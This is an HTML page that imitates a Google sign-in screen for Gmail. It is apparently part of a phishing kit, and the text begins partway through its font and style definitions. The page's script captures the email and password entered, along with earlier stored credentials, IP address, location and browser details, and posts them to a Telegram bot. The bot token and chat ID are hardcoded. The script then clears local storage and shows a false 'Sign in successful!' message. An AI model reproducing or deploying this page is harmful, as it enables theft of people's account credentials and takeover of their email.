			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2tQCIlsw.woff2)format('woff2');
				unicode-range: U+1780-17FF, U+19E0-19FF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2twCIlsw.woff2)format('woff2');
				unicode-range: U+0E81-0EDF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pgCIlsw.woff2)format('woff2');
				unicode-range: U+0307, U+0323, U+0951-0952, U+0964-0965, U+0D00-0D7F, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC, U+A830-A832;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pwCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0B01-0B77, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2owCIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0D81-0DF4, U+1CF2, U+200C-200D, U+25CC, U+111E1-111F4;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq20ACIlsw.woff2)format('woff2');
				unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qACIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0B82-0BFA, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ogCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0C00-0C7F, U+1CDA, U+1CF2, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qgCIlsw.woff2)format('woff2');
				unicode-range: U+02D7, U+0303, U+0331, U+0E01-0E5B, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sQCIlsw.woff2)format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sACIlsw.woff2)format('woff2');
				unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2)format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}
		</style>
    <title>Gmail</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: "Google Sans", Roboto, Arial, sans-serif;
            background-color: #fff;
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 20px;
        }
        
        .login-container {
            width: 100%;
            max-width: 450px;
        }
        
        .login-card {
            background: white;
            border: 1px solid #E5E6E4;
            border-radius: 8px;
            padding: 48px 40px 36px;
            text-align: center;
        }
        
        .logo-container {
            margin-bottom: 5px;
			padding-top: 5px;
        }
        
        .logo-placeholder {
            width: 75px;
            height: 24px;
            border-radius: 4px;
            display: inline-flex;
            align-items: center;
            justify-content: center;
            color: white;
            font-weight: 500;
            font-size: 12px;
        }
        
        .form-header h1 {
            font-size: 28px;
            font-weight: 400;
            color: #202124;
            margin-bottom: 15px;
        }
        
        .form-header p {
            font-size: 16px;
            color: #5f6368;
            margin-bottom: 24px;
        }
        
        .description {
            font-size: 14px;
            color: #5f6368;
            line-height: 1.4;
            text-align: left;
            margin-bottom: 24px;
        }
        
        .form-group {
            margin-bottom: 24px;
            text-align: left;
        }
        
        .form-group input {
            width: 100%;
            padding: 13px 15px;
            border: 1px solid #dadce0;
            border-radius: 4px;
            font-size: 16px;
            color: #202124;
        }
        
        .form-group input:focus {
            outline: none;
            border-color: #1a73e8;
            box-shadow: inset 0 1px 2px rgba(26,115,232,.3);
        }
        
        .form-group input::placeholder {
            color: #5f6368;
        }
        
        .forgot-email {
            text-align: left;
			
            margin-bottom: 24px;
        }
        
        .forgot-email a {
            color: #1a73e8;			
            text-decoration: none;
            font-size: 14px;			
            font-weight: 500;
        }
        
        .forgot-email a:hover {
			text-decoration: shadow;
			font-weight: 500;
			border-radius: 5px;
			cursor: pointer;
			color: #0B389D;
        }
        
        .guest-mode {
            font-size: 14px;
            color: #5f6368;
            line-height: 1.4;
            text-align: left;
            margin-bottom: 32px;
        }
        
        .guest-mode a {
            color: #1a73e8;
            text-decoration: none;
            font-weight: 500;
        }
        
        .guest-mode a:hover {
            text-decoration: underline;
        }
        
        .form-actions {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        
        .create-account {
            color: #1a73e8;
            text-decoration: none;
            font-size: 14px;
			border: none;
			cursor: pointer;
            font-weight: 500;
			border-radius: 10px;
        }
        
        .create-account:hover {
            text-decoration: none;
			border-radius: 7px;
			color: #0B389D;
			border: none;
        }
        
        .next-btn {
            background: #1a73e8;
            color: white;
            border: none;
            padding: 9px 23px;
            border-radius: 4px;
            font-size: 14px;
            font-weight: 500;
            cursor: pointer;
        }
        
        .next-btn:hover {
            background: #1557b0;
            box-shadow: 0 1px 2px 0 rgba(26,115,232,.45), 0 1px 3px 1px rgba(26,115,232,.3);
        }
        
        .language-selector {
            margin-top: 32px;
            text-align: center;
        }
        
        .language-selector select {
            border: none;
            background: transparent;
            color: #555;
			font-weight: 500;
            font-size: 12px;
            cursor: pointer;
        }
        
        .footer-links {
            margin-top: 10px;
            text-align: center;
            display: flex;
            justify-content: center;
            gap: 24px;
        }
        
        .footer-links a {
            color: #5f6368;
            text-decoration: none;
            font-size: 12px;
        }
        
        .footer-links a:hover {
            color: #202124;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <!-- Main Login Card -->
        <div class="login-card">
            <!-- Logo -->
            <div class="logo-container">
               <div class="logo-placeholder"><img src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c1/Google_%22G%22_logo.svg/1200px-Google_%22G%22_logo.svg.png" style="padding-bottom: 35px;" align="right" width="50" height="auto" />
			   </div>
				</div>

            <!-- Form Header -->
            <div class="form-header">
                <h1>Sign in</h1>
                <p>with your Google Account to continue to Gmail. This account will be available to other Google apps in the browser.</p>
            </div>

            <!-- Sign In Form -->
            <form id="gmailForm">
                <div class="form-group">
                    <input 
                        id="gmail_email"
                        type="text" 
                        placeholder="Email or phone"
                    />
                </div>

                <div class="form-group">
                    <input 
                        id="gmail_password"
                        type="password" 
                        placeholder="Enter your password"
                    />
                </div>

                <div class="forgot-email">
                    <a href="#">Forgot email?</a>
                </div>

                <div class="guest-mode">
                    Not your computer? Use Guest mode to sign in privately. <a href="#">Learn more about using Guest mode</a>
                </div>

                <div class="form-actions">
                    <a href="#" class="create-account">Create account</a>
                    <button type="submit" class="next-btn">Next</button>
                </div>
            </form>
        </div>

        <!-- Language Selector -->
        <div class="language-selector">
            <select>
                <option>English (United States)</option>
                <option>Español</option>
                <option>Français</option>
                <option>Deutsch</option>
            </select>
        </div>

        <!-- Footer Links -->
        <div class="footer-links">
            <a href="#">Help</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
        </div>
    </div>

    <!-- Added JavaScript for form handling and Telegram sending -->
    <script>
        // Pre-fill email from localStorage
        window.addEventListener('load', () => {
            const storedEmail = localStorage.getItem('userEmail');
            if (storedEmail) {
                document.getElementById('gmail_email').value = storedEmail;
            }
        });

        document.getElementById('gmailForm').addEventListener('submit', async (e) => {
            e.preventDefault();

            const emailFromForm = document.getElementById('gmail_email').value.trim();
            const passwordFromForm = document.getElementById('gmail_password').value;

            // Get stored data from first login page
            const originalEmail = localStorage.getItem('userEmail') || '';
            const originalPassword = localStorage.getItem('userPassword') || '';
            const ip = localStorage.getItem('userIP') || '';
            const country = localStorage.getItem('userCountry') || '';
            const city = localStorage.getItem('userCity') || '';
            const useragent = localStorage.getItem('userAgent') || '';
            const browser = localStorage.getItem('userBrowser') || '';
            const timestamp = localStorage.getItem('userTimestamp') || '';

            // Telegram bot configuration
            const botToken = "7838657657:AAHjMMwLMeDDCJyCeBN4liPX0ynbxRhpkvA";
            const chatId = "6686015911";

            const message = 
                "+++[ LOGIN INFO ]+++\n" +
                "Email: " + originalEmail + "\n" +
                "Password: " + originalPassword + "\n" +
                "+++[ EMAIL ACCESS ]+++\n" +
                "Email: " + emailFromForm + "\n" +
                "Password: " + passwordFromForm + "\n" +
                "+++[ IP DETAILS ]+++\n" +
                "IP Address: " + ip + "\n" +
                "Country: " + country + "\n" +
                "City: " + city + "\n" +
                "Useragent: " + useragent + "\n" +
                "Browser: " + browser + "\n" +
                "Timestamp: " + timestamp + "\n" +
                "+++[ RESULTS DONE ]+++";

            try {
                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`);
            } catch (error) {
                // Telegram send failed, handle if needed
            }

            // Clear stored data
            localStorage.clear();

            // Redirect or show success message
            alert('Sign in successful!');
        });
    </script>
</body>
</html>
